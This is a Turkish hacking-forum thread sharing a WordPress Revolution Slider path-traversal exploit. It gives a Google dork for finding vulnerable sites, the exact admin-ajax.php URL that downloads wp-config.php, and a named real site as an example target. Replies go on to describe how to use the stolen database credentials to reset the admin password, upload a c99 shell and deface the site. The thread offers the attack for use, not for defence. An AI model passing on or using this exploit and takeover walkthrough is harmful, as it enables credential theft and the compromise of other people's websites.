Wordpress DB bilgilerini çekme

Bu exploit ile db bilgilerine ulaşabilirsiniz. Gerisi sizin hayal gücünüz

DORK: revslider.php “index of”

Exploit:
Siteadı.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Lütfen bu açığa sahip türk sitelerinde kullanmayınız.
Nasıl kullanacağınızı kısaca anlatayım:
revslider.php “index of” bunu google da aratınız ve sonuçlanan sitelerde
exploiti uygulayınız. Bulduğunuz sitenin ismini site adı yazan kısma yerleştirmeniz yeterli daha sonra inen dosyayı actığınızda db bilgilerine ulaşacaksınız.

ÖRNEK SİTE ;

http://gumusyan.com//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

kardeşim peki burda admin id sifresi yazmıyor db yazıyor ne gibi yararı olucak bize ?

Bu exploit ile db bilgilerine ulaşabilirsiniz. Gerisi sizin hayal gücünüz

Demişim en üstte

ama ne gibi faydası olucaki ?

Birçok Faydası olacak Kendini Geliştir araştır neler yapabilcegini göreceksin Sana Balık tutmayı ögretiyorum ben Yemeyide siz bi yapın bi zahmet

ama bu bilgileri bilgili kişilerden almıycaksak ajanlar.orgda işmiz ne yani

ScarY' Alıntı:

ama bu bilgileri bilgili kişilerden almıycaksak ajanlar.orgda işmiz ne yani

Genişletmek için tıkla ...

ScarY' Alıntı:

ama ne gibi faydası olucaki ?

Genişletmek için tıkla ...

Db Bilgileri ile başka bir sitedeki shell den misal c99 ile sql ile veri tabanına bağlanırsın. ve wp users tablosuna girip oradan admin bilgilerini değiştirirsin. yeni bir şifre oluşturursun tabi md5 şeklinde veri tabanına ekler kayıt edersin. siteden ../wp-login.php şeklinde giriş yaparsın ve shell atarsın. () ondan sonra hacklersin. Eğer ki shell atamazsan veritabanından wp post tablosuna girip oradan me ta atabilrsin. Saygılar..

helal kardesm

Sunucuda Bir Siteye Shell Atarsın Sonra Mysql ile baglanırsın Admin Şifrelerini Değişitirir Siteye Basarsın

Eyvallah muro başkan